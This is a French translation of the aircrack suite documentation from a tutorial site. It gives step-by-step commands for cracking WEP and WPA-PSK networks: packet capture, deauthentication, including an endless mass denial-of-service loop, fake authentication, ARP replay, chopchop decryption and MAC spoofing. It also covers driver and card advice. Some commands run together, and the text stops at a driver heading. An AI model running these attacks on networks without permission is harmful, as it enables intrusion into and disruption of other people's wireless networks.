24200329 Decryptage Clef Wep Suite

Documentation de aircrack

Présentation

Qu'est ce que aircrack ? Comment craquer une clef wep statique ? Combien de IVs sont necessaires pour cracker une clef WEP ? Télécharer troppix 1.0, 1.1 et 1.2

Installation (win32)

J'ai le message "cygwin1.dll not found" lors du lancement de aircrack.exe. Pourquoi n'existe-t-il pas de version d'airplay pour windows ? Les drivers peek ne reconnaissent pas ma carte.

Airodump

Comment utiliser airodump sous Windows ? Quelle est la signification des champs affichés par airodump ? Pourquoi je ne parviens pas à compiller airodump et aireplay sur BSD / Mac OS X ? Comment utiliser airodump sous linux ? Airodump ne cesse de balancer entre WEP et WPA Il semble que je ne capture aucuns IVs ! Comment fusionner plusieurs fichiers de capture?

Aireplay

Comment utiliser aireplay ?

Attack 0: deauthentication Attaque 1: fake authentication Attaque 2: interactive packet replay Attaque 3: ARP-request reinjection Attaque 4: KoreK's "chopchop" (prédiction CRC)

Attaque sans stations connectés (replay whithout clients)

Aircrack

Comment utiliser aircrack ? J'ai plus d'un millions de IVs mais aircrack ne trouve pas la clef ! Pouvez vous rajouter une fonction de reprise dans aircrack ?

Materiel

Ma carte est-elle compatible avec airodump / aireplay ? Quelle est la meilleur carte a acheter?

Firmewares / pilotes

Comment mettre à jour mon firmware Prism2 ? Comment mettre à jour les pilotes pour l'injection avec aireplay ?

Installer le pilote driver madwifi (cartes Atheros) Installation des pilotes / drivers prism54 (Cartes PrismGT FullMAC) Installation des pilotes / drivers HostAP (Cartes Prism2) Installation des pilotes / drivers wlan-ng (Cartes Prism2) Installation des pilotes / drivers r8180-sa2400 (Cartes RTL8180) Installation des pilotes / drivers rt2500 (Ralink b/g PCI/CardBus) Installation des pilotes / drivers rt2570 (Ralink b/g USB)

Le driver ne se compile pas. Je possède une carte Prism2, mais airodump / aireplay ne semblent pas fonctionner! Je possede une carte Atheros, et le patch madwifi fait planter le kernel /

aireplay continue de me dire que le support amélioré du RTC n'est pas disponible

WPA

Comment puis-je craquer un reseau WPA-PSK ? WZCOOK retrouve-t-il les clefs WPA ? Le WPA va-t-il être cracker dans le futur ?

Autres

Comment fusionner plusieurs fichiers de capture? Comment savoir si ma clef WEP est correcte ? Pas moyen de cracker cet AP ! Comment retrouver mes clef wep sous Windows ? Comment puis-je changer l'adresse mac de ma carte? Puis-je utiliser Ethereal pour capturer des paquets 802.11? Ethereal peut-il decoder les paquets de données WEP ? J'ai trouver la clef, comment decrypter le fichier de capture ?

Qu'est ce que aircrack ?

aircrack est une serie d'outils de monitoring pour reseaux sans fil :

● airodump: 802.11 programme de capture de paquets ● aireplay: 802.11 programme d'injection de paquets ● aircrack: crackeur de clef wep statiques et WPA-PSK ● airdecap: decrypte les fichiers WEP/WPA capturés

Comment puis je cracker une clef wep statique ?

L'idée de base est de capturer le plus possible de traffic crypté avec airodump. Chaque paquet crypté avec une clef WEP est associé à un vecteur d'initialisation (IV) de 3 bytes: apres avoir collecté un nombre suffisant de paquets de données , lancez aircrack sur le fichier de capture. Aircrack va alor effectué un ensemble d'attaques statistiques developpées par un hacker talentueux nommé KoreK.

Combien de IVs sont necessaires pour cracker une clef WEP ?

Le craquage de clef WEP n'est pas une science exacte. Le nombre de IVs necessaires depend de la longueure de la clef et aussi de votre chance. Habituellement ,les clef WEP¨40-bit peuvent etre craquées avec 300 000 IVs, les 104-bit avec 1.000.000 IVs; Si vous n'avez pas de chance vous pouriez avoir besoin de 2 millions de IVs ou plus.

Il n'y a aucune manière de connaitre la longueure de la clef: cette information est maintenue cachée et jamais dévoilée; En consequence , airodump ne peut pas indiquer la longueure de la clef WEP. Ainsi il est recommandé de lancer aircrack 2 fois: lorsque vous avez 250.000 IVs, lancez aircrack avec le parametre "-n 64" pour cracker une clef WEP 40-bit. Ensuite si la clef n'est pas trouvée, relancez aircrack (sans l'option -n) pour cracker une clef WEP 104-bit.

Télécharger troppix 1.0 et 1.2

Christophe Devine a arréter le devloppement de la suite aircrack mais aussi de troppix, la meilleure distribution live cd niveau compatibilité materiel wifi :'(.

Voici donc quelques liens pour télécharger troppix

● http://distrowatch.com/ ● http://www.idg.pl● http://de3.mirrors.flosoft.biz/

Vous pouvez également consulter ce sujet pour annoncer de nouveaux liens ou autres:

forum.tuto-fr.com/

J'ai le message "cygwin1.dll not found" lors du lancement de aircrack.exe.

Vous pouvez telecharger cette bibliotheque ici : cygmin1.dll

Pour utiliser aircrack, glissez deposez vos fichiers de capture .cap ou .ivs sur aircrack.exe. Si vous souhaitez configurer les options, vous devez lancer une invite de commande (cmd.exe) et entrer manuellement les lignes de commandes; il y a également une interface graphique pour aircrack, developée par hexanium.

Exemple:

C:\TEMP> aircrack.exe -n 64 -f 8 out1.cap out2.cap ...

Voir ici pour liste des options.

Pouquoi n'existe-t-il pas de version d'airplay pour windows ?

Les drivers PEEK ne supportent pas l'injection de paquets 802.11; Il y a cependant des alternatives commerciales :

Cartes Prism : http://www.tuca-software.com/transmit.php

Cartes Atheros: http://www.tamos.com/htmlhelp/commwifi/pgen.htm

Les drivers peek ne reconnaissent pas ma carte.

Certaines cartes ne sont pas reconnues par les pilotes Windows, malgré qu'elles possèdent le bon chipset. Dans ce cas, ouvrez le gestionnaire de péripheriques, selectionnez votre carte puis "Mettre à jour le driver", selectionnez "Installer à partir d'une liste ou d'un emplacement spécifié", selectionnez "Ne pas chercher je vais choisir le pilote à installer ", cliquez sur "Disque fournit",indiquez le chemin ou vous avez dézippé le pilote, désélectionner "Montrez moi le materiel compatible", et enfin choisissez le pilote.

● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos

Traduction française, original Voir le tutorial


retour a l'index de la doc

Comment utiliser airodump sous Windows ?

Premièrement assurez vous d'avoir installer le bon pilote et vérifiez la compatibilité de votre carte (voir le tableau).

Lors de l'utilisation de airodump, vous devez spécifier:

● Le numéro de l'interface reseau que vous devez choisir dans la liste donnée par airodump. ● Le type d'interface reseau ('o' Pour HermesI et Realtek, 'a' pour Aironet, Atheros, Broadcom et

PrismGT). ● Le numéro de canal, compris entre 1 et 14. Vous pouvez également spécifier 0 pour tous les

sélectionner. ● Le préfixe des fichiers de sortie. Par exemple, si le préfixe est "foo", airodump va creer un

fichier foo.cap (paquets capturés) et foo.txt (statistiques CSV). Si le fichier foo.cap existe déja, airodump reprendra la session de capture en ajoutant les paquets à la précédente.

● Le choix "uniquement les IVs". Mettez 1 si vous souhaitez sauvegarder que les IVs provenat des paquets de données WEP. Ceci permet d'obtenir un fichier beaucoup moin volumineux mais le fichier de sortie (foo.ivs) ne pourra être utiliser que pour le crack de la clef wep.

Pour arreter la capture de paquet, appuyer sur Ctrl+C. Il est probable que vous obteniez un ecran bleu, ceci est imputable à un bug des pilotes Peek qui ne quite pas correctement le mode monitor. La cause de ce bug reste inconnue.

Tutoriaux photoshop © Copyright 2005-2006 Tuto-fr.com par Billyboylindien

Déclaré à la cnil: Dossier n° 1142196 Rc v2.0

Il y a actuellement 45 visiteur(s) connecté(s) !

Proposez vous aussi vos tutos

et publiez les sur le site !

● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Quelle est la signification des champs affichés par airodump ?

Airodump va afficher une liste des points d'accès détectés et également une liste des client connectés ("stations"). Voici un exemple effectué avec une carte Prism2 et HostAP:

BSSID PWR Beacons # Data CH MB ENC ESSID

00:13:10:30:24:9C 46 15 3416 6 54. WEP le ssid 00:09:5B:1F:44:10 36 54 0 11 11 OPN NETGEAR

BSSID STATION PWR Packets Probes

00:13:10:30:24:9C 00:09:5B:EB:C5:2B 48 719 le ssid 00:13:10:30:24:9C 00:02:2D:C1:5D:1F 190 17 le ssid

Champ Description

BSSID Adresse MAC du point d'accès.

PWRNiveau du signal indiqué par la carte. Sa signification depend du driver, mais plus le signal est haut plus vous êtes rapproché de l'AP. Si PWR == -1, le pilote ne supporte pas l'indication de niveau de puissance.

BeaconsNombre de paquets d'annonce envoyé par l'AP. Chaque AP envoit environ dix paquets par seconde au plus bas taux (1M), ainsi ils peuvent habituellement être récoltés de très de loin.

# Data Nombre de paquets de donneés capturés (si WEP, compte unique de IV), incluant les paquets d'annonce (broadcast packets).

CHNuméro de canal (tiré des beacon packets). Note: parfois des paquets d'autres canaux sont capturés malgré que airodump ne soit pas configuré pour les recevoir. Ceci à cause d'interferences radio.

MBVitesse maximum supportée par AP. Si mb = 11, il s'agit de 802.11b, si mb = 22 il s'agit de 802.11b+ et les taux plus élevés sont du 802.11g. Le point (après 54 ci-dessus) indique que le préambule court est supporté.

ENC

Algorithme d'encription utilisé. OPN = pas d'encryption, "WEP?" = WEP ou plus (pas assez de données pour choisir entre WEP et WPA), WEP (sans le point d'interrogation) indique du WEP statique ou dynamique, et WPA si TKIP ou CCMP est détecté.

ESSIDAussi nommé "SSID", il peut être vide si sa diffusion est désactivée. Dans ce cas, airodump essayera de récupérer le SSID à partir des reponses de sondes (probe responses) et des demandes d'association.

STATION Adresse MAC de chacune des station connectées. Dans l'exemple deux client ont été détectés (00:09:5B:EB:C5:2B et 00:02:2D:C1:5D:1F).






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos

Traduction française, voir l'original de cette page ici



Pourquoi je ne parviens pas à compiller airodump et aireplay sur BSD / Mac OS X ?

Les sources de chacun sont spécifiques a linux. Il n'y a pas de projet visant a les porter sur un autre système d'exploitation.






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Comment utiliser airodump sous linux ?

Avant de démarrer airodump, vous lancer le script airmon.sh pour lister les differentes interfaces wifi détectés. Il est possible, bien que non recommandé, de lancer à la fois Kismet et airodump.

usage: airodump <interface> <préfixe de sortie> [canal] [choix IVs]

Specifiez le canal 0 pour sélétionner tous les canaux de 2.4GHz. Mettez 1 pour le choix des IVs si vous souhaitez sauvegarder que les IVs Ceci permet d'obtenir un fichier il ne pourra être utiliser que pour le crack de la clef wep.

Si le client gpsd est lancé, airodump trouvera et sauvegardera les coordonnés GPS en cour dans un fichier text.

Vous pouvez convertir un fichier .cap / .dump en un fichier .ivs en utilisant le programme pcap2ivs (linux uniquement).






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Airodump ne cesse de balancer entre WEP et WPA

Ceci se produit car votre pilote ne reconnait pas les paquets corrompus (dont le CRC est invalide). Si il s'agit d'une centrino b, on ne peut rien faire; allez acheter une meilleure carte. Si s'est une Prism2 essayez de mettre à jour le firmware.






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Comment fusionner plusieurs fichiers de capture?

Vous pouvez utiliser le programme mergecap (partie du pack commun d'ethereal ou de la distribution win32):

mergecap -w sortie.cap test1.cap test2.cap test3.cap

Les fichiers .ivs peuvent etre assemblés avec le programme "mergeivs" (linux uniquement).






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Comment mettre à jour les pilotes pour l'injection avec aireplay ?

Drivers Madwifi, Prism54, HostAP, Wlan-ng, r8180-sa2400, Rt2500, Rt2700

Pour le moment, l'injection de paquet avec aireplay est supportée uniquement sur les Prism2, PrismGT (FullMAC), Atheros, RTL8180 et Ralink. L'injection sur Centrino, Hermes, ACX1xx, Aironet, ZyDAS, Marvell and Broadcom n'est pas supporté en raison des firmwares ou des limitations des pilotes.

L'injection sur Prism2 et Atheros reste encor très experimentale; Si votre carte semble ne rien faire (pas de paquets capturés ou injectés), désactivez l'interface, relancer les pilotes et reconnecter la carte. Considérez également la mise à jour du firmware (si Prism2).

Tous les pilotes doivent être mis à jour pour supporter l'injection en mode Monitor. Vous aurez besoin des en-tetes linux qui vous indiquerons la version de votre noyau; sinon, vous devrez télécharger les sources de linux et vous compiler un noyau personalisé.

Si vous vous éprouvez des problèmes, vous pouvez utiliser le LiveCD Troppix , qui inclue les mise à jours périphériques.






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Comment utiliser aireplay ?

Si le pilote est correctement mis à jour, aireplay est capable d'injecter des paquets 802.11 en mode monitor; il ya actuellement 5 attaques différentes.

Si vous obtenez "ioctl(SIOCGIFINDEX) failed: No such device", vérifiez que le nom de votre périphérique soit correct et que vous n'avez pas oubliez de paramètres dans la ligne de commande.

Dans les exemples suivant , 00:13:10:30:24:9C est l'adresse MAC du point d'acces (sur le canal 6), et 00:09:5B:EB:C5:2B est l'adresse MAC d'un client (connecté en wifi).

Desauthentification, Fake authentication, Interactive paquet replay, ARP request injection, Korek chop-chop






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Attack 0: deauthentication Attaque par desauthentification

Cette attaque est extremement utile pour retrouver un ESSDI caché (not broadcasted) et pour la capture de handshakes WPA en forçant le client à se réauthentifier. On peut aussi s'en servir pour générer des requetes ARP car les clients Windows vident parfois leur cache ARP quand ils sont déconnectés. Biensur cette attaque est totalement inutile si il n'y a pas de client wifi associés.

Dans les exemples suivant , 00:13:10:30:24:9C est l'adresse MAC du point d'acces (sur le canal 6), et 00:09:5B:EB:C5:2B est l'adresse MAC d'un client (connecté en wifi).

Il peut etre utile de cibler une station spécifique en utilisant le paraètre -c.

Exemples:

@ MAC de l'AP (canal 6):00:13:10:30:24:9C @ MAc du client wifi: 00:09:5B:EB:C5:2B

● Capture d'Handshake WPA avec une Atheros

airmon.sh start ath0airodump ath0 out 6 (basculez dans une autre console)aireplay -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0(attendez quelques secondes)aircrack -w /path/to/dictionary out.cap

● Demande de génération d'ARP avec une carte Prism2

airmon.sh start wlan0airodump wlan0 out 6 (basculez dans une autre console)aireplay -0 10 -a 00:13:10:30:24:9C wlan0aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

Apres avoir envoyer les 5 series de paquets de desauthentification, on commence à capturer les requetes ARP avec l'attaque 3. L'option -h est obligatoire et doit être l'adresse MAC d'un client associé.

Si le pilote est wlan-ng, vous devez lancer le script airmon.sh ; sinon la carte ne sera pas correctement configurée pour l'injection.

● Denis de service en masse avec une carte RT2500

airmon.sh start ra0aireplay -0 0 -a 00:13:10:30:24:9C ra0

Avec le parametre 0, cette attaque va recommencer indefiniement à envoyer des paquets de desauthentification à l'adresse d'emission, empechant ainsi aux clients de rester connectés.






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Attaque 1: fake authentication Attaque par fausse authentification

Les autres attaques: Desauthentification, Fake authentication, Interactive paquet replay, ARP request injection, Korek chop-chop

Cette attaque est seulement utile lorsque vous avez besoin d'une adresse MAC associée pour les attaques 2, 3, 4 (option -h) et qu'il n'y a pas de client associés pour le moment. Il est recommandé d'utilisé l'adresse MAc d'un client réel (par exemple, 00:09:5B:EB:C5:2B)dans les attaques 2, 3 et 4. L'attaque fake authentication ne génère PAS de requetes ARP.

En outre, les attaques suivantes s'exécuteront probablement mieux si vous mettez à jour l'adresse MAC de la carte, de sorte qu'elle envoie correctement les ACKs :


ifconfig ath0 downifconfig ath0 hw ether 00:11:22:33:44:55ifconfig ath0 up

aireplay -1 0 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath012:14:06 Sending Authentication Request12:14:06 Authentication successful12:14:06 Sending Association Request12:14:07 Association successful :-)

Avec madwifi CVS 2005-08-14 mis à jour, il est possible d'injecter des aquets en mode Managed (la clef wep elle meme importe peut tant que l'AP accepte les authetifications Open-System).

ifconfig ath0 down hw ether 00:11:22:33:44:55iwconfig ath0 mode Managed essid 'the ssid' key AAAAAAAAAAifconfig ath0 up

sysctl -w dev.ath0.rawdev=1ifconfig ath0raw upairodump ath0raw out 6

Ensuite vous pouvez lancer les attaques 3 ou 4 (aireplay va remplacer automatiquement ath0 par ath0raw dans ce qui suit):

aireplay -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0aireplay -4 -h 00:10:20:30:40:50 -f 1 ath0

Certains AP requièrent de s'associer toutes les 30 secondes, autrement le client est considéré comme déconnecté. Dans ce cas mettez en place une réauthentification periodique:

aireplay -1 30 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

Si cette attaque semble mal se dérouler (aireplay ne s'arrete pas d'envoyer des requetes d'authentification), un filtrage d'adresse MAC doit être en place. Assurez vous que:

● Vous n'êtes pas trop loin du point d'acces.● Le pilotes soient correctement installés et mis à jour. ● La carte est configurée sur le meme canal que l'AP. ● Les BSSID et ESSID (-a / -e options) sont corrects. ● Si il s'agit de Prism2 assurez vous d'avoir les firmwares mis à jour.

Rappel:L'injection sur Centrino, Hermes, ACX1xx, Aironet, ZyDAS, Marvell et Broadcom n'est pas supporté a cause des firmwares ou des limitations des pilotes.






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Attaque 2: interactive packet replay Reinjection selective de paquets


Cette attaque vous autorise à choisir un paquet particulier pour etre répété; cela produit parfois de meilleurs resultats que l'attaque 3 (injection automatique d'ARP).

Vous pouvez par exemple l'utiliser pour tenter l'attaque "any data re-broadcast", qui ne fonctionne actuellement que si l'Ap réencrypte les paquets de données:


aireplay -2 -b 00:13:10:30:24:9C -n 100 -p 0841 \ -h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0

Vous pouvez aussi utilisez l'attaque 2 pour renvoyer manuellement des requetes ARP cryptées en WEP, dont la taille et soit 68 soit 86 bytes (suivant le système d'expoitation):

aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \ -m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0

aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \ -m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Attaque 3: ARP-request reinjection Réinjection de requetes ARP


L'attaque classique de réinjection de requetes ARP est la plus efficace pour produire de nouveaux IVs et fonctionne très bien. Vous avez besoin soit de l'adresse MAC d'un client associé (00:09:5B:EB:C5:2B), soit une fausse adresse MAC provennat de l'attaque 1 (00:11:22:33:44:55). Il est probable que vous deviez patienter une durée temps plus ou moin longue avant qu'une requetes ARP ne se montre.; cette attaque échouera si il n'y a pas de traffic.

Notez bien que vous pouvez réutilisé les ARP précedement capturé avec le parametre -r.

aireplay -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0Saving ARP requests in replay_arp-0627-121526.capYou must also start airodump to capture replies.Read 2493 packets (got 1 ARP requests), sent 1305 packets...







● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Attaque 4: KoreK's "chopchop" (prédiction CRC)


Cette attaques, lorsqu'elle fonctionne, peut décrypter un paquet WEP sans en connaitre la clef. Elle peut même fonctionner contre une WEP dynamique. Cette attaque ne récupère pas la clef WEP elle-même, mais indique simplement le plaintext. Cependant, la plupart des points d'accès ne sont pas vulnérables. Certains peuvent sembler vulnérables d'abord mais actuellement les paquets de données sont plus petits que 60 bytes. Cette attaque exige au moins un paquet de données de WEP.


1. Premierement on decrypte le paquet:

aireplay -4 -h 00:09:5B:EB:C5:2B ath0

2. Regardons l'adresse IP :

tcpdump -s 0 -n -e -r replay_dec-0627-022301.capreading from file replay_dec-0627-022301.cap, link-type [...]IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

3. Ensuite forgeons une requete ARP.

L'adresse IP source (192.168.1.100) importe peu, mais celle de destination (192.168.1.2) doit correspondre aux requetes ARP. L'adresse MAc de la souce doit appartenir a une station associée.

./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap

4. Et envoyons notre requete ARP:

aireplay -2 -r arp.cap ath0






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos

Injection de paquets sans client connectés


Pour vous éclairer, rien de mieux qu'une bonne vidéo: Injection de paquets sans stations

Je previent de suite: Cette methode est aléatoire et ne fonctionne pas sur tout les AP !!!

Explication brève de la vidéo:

On lance airodump. Puis il lance une attaque -1 qui va faire apparaitre la station utilisée dans cette attaque dans airodump (avec un paramètre de temps pour que l'authentification se fasse tout les tant). Ensuite on (fenètre du bas) lance une requete -3 pour choper un ARP une fois que la station est apparue dans airodump. Il faut bien laisser l'authentification tourner.






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Comment utiliser aircrack ?

Utilisation: aircrack [options] <fichier(s) capturé(s)>

Vous pouvez spécifier plusieurs fichiers d'entrée (en format .ivs ou .cap). En outre, vous pouvez lancer airodump et aircrack en même temps : aircrack mettra à jour automatiquement quand de nouveaux IVs seront disponibles.

Voici un sommaire de toutes les options disponibles:

Option Param. Description

-a amode Mode d'attaque (1 = statique WEP, 2 = WPA-PSK).

-e essidSi indiqueé, tout les IVs possedant le meme SSID seront utilisés. Cette option est indispensable pour le crack du WPA-PSK si le ESSID n'est pas difusé.

-b bssid Selection du reseau cible à partir de l'adresse MAC de l'Ap.

-p nbcpu Sur les systemes SMP, indiquez le nombre de CPU.

-q none Activation du mode silence (aucun affichage jusqu'a ce que la clef soit trouvée pou non).

-c none (WEP crack) Reduire le champ de recherche aux caractères alpha-numerique uniquement(0x20 - 0x7F).

-t none (WEP crack) Reduire le champ de recherche aux caractères binaires decimaux hex.

-d start (WEP crack) Indique le début de la clef WEP (en hex), en vue d'un debuggage

-m maddr(WEP crack) Adresse MAC à filtrer dans les paquets de données WEP. Vous pouvez specifier -m ff:ff:ff:ff:ff:ff pour utiliser tout les IVs, indépendamment du reseau.

-n nbits (WEP crack) Specifiez la longueur de la clef: 64 pour 40-bit WEP, 128 pour 104-bit WEP, etc. La valeure par defaut est 128.

-i index (WEP crack) Conserve uniquement les IVs ayant cet index de clef (1 à 4). Par defaut l'index de clef est ignoré.

-f fudge

(WEP crack) Par defaut, ce paramètre est reglé à 2 pour une clef WEP a 104-bit et à 5 pour une de 40-bit. Spécifier une valeure plus grande pour augmenter le niveau de bruteforce: Le crack sera plus long mais aura également de plus grandes chances de succès

-k korek

(WEP crack) Il y a 17 attaques statistique de Korek. Parfois, une attaque crée des erreurs empéchant de trouver la clé marlgré un nombre important de IVs. Essayez -k 1, -k 2, ... -k 17 pour sélectionner chaque attaque à désactiver.

-x none (WEP crack) Active le bruteforce pour les 2 derniers byts de la clef.

-y none(WEP crack) Ceci est une simple attaque brutforce experimentale que vous pouvez utiliser si l'attaque standard ne fonctionnait pas malgré plus d'un million de IVs.

-w words (WPA crack) Chemin vers un dictionnaire






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




J'ai plus d'un millions de IVs mais aircrack ne trouve pas la clef !

Raisons possibles:

● Pas de chance : Vous devez capturer plus de IVs. Habituellement une clef WEP104-bit se craque avec un million de IVs mais parfois il en faut plus.

● Si tous les votes semblent identiques, alor le fichier de capture est corrompu ou la clef n'est pas statique (EAP/802.1X utilisé ?).

● Un "false positive" à empecher de trouver la clef. Essayez de désactiver chaque attaque korek (-k 1 .. 17), augmentez le fudge factor (-f) ou essayer l'attaque experimentale (-x / -y).






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Pouvez vous rajouter une fonction de reprise dans aircrack ?

Il n'y a rien de prevu en ce sens pour le moment.






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Ma carte est-elle compatible avec airodump / aireplay ?

Voir ici une liste de cartes compatibles aircrack et ici

Premierement utilisez google pour trouver le chipset de votre carte. Par exemple, si vous possedez une WPC54G : "wpc54g chipset linux".

ChipsetSupportée par airodump sous

Windows ?

Supportée par airodump sous

Linux ?

Supportée par aireplay sous Linux ?

HermesI OUI (driver Agere) OUI (driver patché orinoco)

NON (le firmwar corrompt l'adresse MAC)

Prism2/3NON mais voir LinkFerret pour une alternative

OUI (HostAP ou wlan-ng driver), STA firmware 1.5.6 ou plus recent requis

OUI (PCI et CardBus uniquement, mise à jour driver requise)

PrismGTOUI (PrismGT driver)

FullMAC: OUI (prism54 driver, SoftMAC: Pas encor(prism54usb)

OUI (mise a jour du driver recommandée)

Atheros

CardBus: OUI (Atheros driver), PCI: NON (voir CommView WiFi)

OUI (PCI et CardBus uniquement, driver madwifi)

OUI (mise a jour du driver recommandée)

RTL8180OUI (Realtek driver)

OUI (rtl8180-sa2400 driver)

UNSTABLE (mise a jour du driver requise)

Aironet OUI? (Cisco driver)OUI (airo driver, firmware 4.25.30 recommended)

NON (firmware issue)

Ralink NONOUI (rt2500 / rt2570 driver)

OUI (mise a jour du driver requise)

Centrino b NONPARTIAL: ipw2100 driver ne reconnais pas les paquets corrompus

NON

Centrino b/g NONOUI (ipw2200 driver, 1.0.6 recommendé)

NON (le firmware perd des paquets)

BroadcomOld models only (BRCM driver)

NOT YET (bcm43xx driver, Linux >= 2.6.14 requit)

NON

TI (ACX100 / ACX111) NON

PAS TESTE (acx100 driver) NON

ZyDAS 1201 NON OUI (zd1211 driver) NON

Others (Marvel...) NON INCONNU NON






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Quelle est la meilleure carte à acheter?

Voici une selection de cartes recommandées: ici

De nos jour, le meilleur chipset est Atheros; il est très bien supporté sous linux, mais également sous Windows (PCMCIA/CardBus uniquement). Les dernières mise à jour madwifi rendent possible l'injection brut de paquet 802.11 (arbitrairement en b/g) en mode Managed (controlé) ou Monitor.

Ralink fabrique de bon chipset b/g, et a été très coopératif avec la communauté open source pour distribuer des pilotes GPL. L'injection de paquets est donc entièrement supporté sous linux sur les cartes PCI/CardBus RT2500, elle fonctionne également sur les péripheriques USB RT2570.

Voici une liste des cartes recommandées :

Nom de la carte Type Chipset Antenne Prix

supporté par

Windows

supporté par

Linux Ou l'acheter ?

MSI PC54G2 PCI Ralink RP-SMA E30 Non Oui

MSI CB54G2 CardBus Ralink Interne E30 Non Oui

Linksys WMP54G v4

PCI Ralink RP-SMA E40 Non Oui

Linksys WUSB54G v4

USB Ralink Interne E40 Non Oui

D-Link DWL-G122

USB Ralink Interne E45 Non Oui

Netgear WG111 USB PrismGT

SoftMAC Interne E40 airodump Non

Netgear WG311T PCI Atheros RP-SMA E50 CommView

WiFi Oui

Netgear WG511T CardBus Atheros Interne E50 airodump Oui

Netgear WAG511 CardBus Atheros Interne E100 airodump Oui

Proxim 8470-WD CardBus Atheros MC +

Int. E110 airodump Oui

Note: il y a quelques modèles meilleur marché avec un nom semblable (WG511, WG311, DWL-G520+ ...); ces cartes ne sont pas basées sur un chipset Atheros. En outre les nouvelles cartes Atheros ne sont pas supportées par les pilotes Peek, vous serez donc contraint d'utiliser CommView WiFi à la place .






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Comment mettre à jour mon firmware Prism2 ?

Le plus simple est de mettre à jour le firmware avec WinUpdate - Vous devez cependant avoir le pilote WPC11 v2.5 installé. Vous pouvez les trouvez tout deux ici: wlan/linux/prism2/.

Vous pouvez également mettre à jour le firmware en patchant HostAP (voir ci-apres pour les instruction pour patcher et installer HostAP). Une autre solution serait de lancer le Live CD Troppix (il possède déja les drivers hostap patchés et l'utilitaire prism2_srec).

Maintenant que HostAP est charger, vous pouvez vérifier la versions principale du firmware puis celle de la station avec cette commande:

# dmesg | grep wifihostap_cs: Registered netdevice wifi0wifi0: NIC: id=0x800c v1.0.0wifi0: PRI: id=0x15 v1.1.1 (Le firmware principal: 1.1.1)wifi0: STA: id=0x1f v1.7.4 (Le firmware de la station: 1.7.4)wifi0: registered netdevice wlan0

Si l'identifiant NIC (id) du dessus est compris entre 0x8002 et 0x8008, vous possédez une ancienne Prism2 et vous devez utiliser la version 1.5.6 du firmware STA (s1010506.hex). Sinon, vous devrez employer, PRI 1.1.1 / STA 1.7.4 qui sont les firmwares les plus stables pour les nouvelles cartes Prism2. N'utilisez PAS les firmware 1.7.1 or 1.8.x, certaines personnes ont ont rapporté avoir des ennuis avec.

Pour mettre à jour le firmware, vous allez avoir besoin de prism2_srec contenu dans le pack hostap-utils; Si jamais il n'était pas present sur votre system, télécharger et compilez le:

wget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/prism2/hostap-utils-0.4.0.tar.gztar -xvzf hostap-utils-0.4.0.tar.gzcd hostap-utils-0.4.0make

Certaines cartes Prism2 sont limitées à certains canaux en raison des reglementations du pays. Vous pouvez activer les 14 canaux avec les commandes suivantes:

./prism2_srec wlan0 -D > pda; cp pda pda.bakEdit pda and put 3FFF at offset 0104 (line 24)

Pour finir, telechargez le firmware et flashez votre carte. Si l'identifiant NIC est compris entre 0x8002 et 0x8008:

wget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/prism2/s1010506.hex./prism2_srec -v -f wlan0 s1010506.hex -P pda

Sinon:

wget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/prism2/pk010101.hexwget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/prism2/sf010704.hex./prism2_srec -v -f wlan0 pk010101.hex sf010704.hex -P pda

Si vous obtenez le message "ioctl[PRISM2_IOCTL_HOSTAPD]: Operation not supported", le pilote HostAP n'est pas chargé et vous devez le réinstaller. Si vous obtenez le message "ioctl[PRISM2_IOCTL_DOWNLOAD]: Operation not supported", dans ce cas votre pilote n'a pas été mise à jour pour le support des téléchargement non-volatiles.






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Installer le pilote driver madwifi (cartes Atheros)

Note 1: vous aurez besoin de uudecode provenant du pack sharutils.

Note 2: Le patch 20051025 devrait fonctionner avec les nouvelles versions du madwifi CVS.

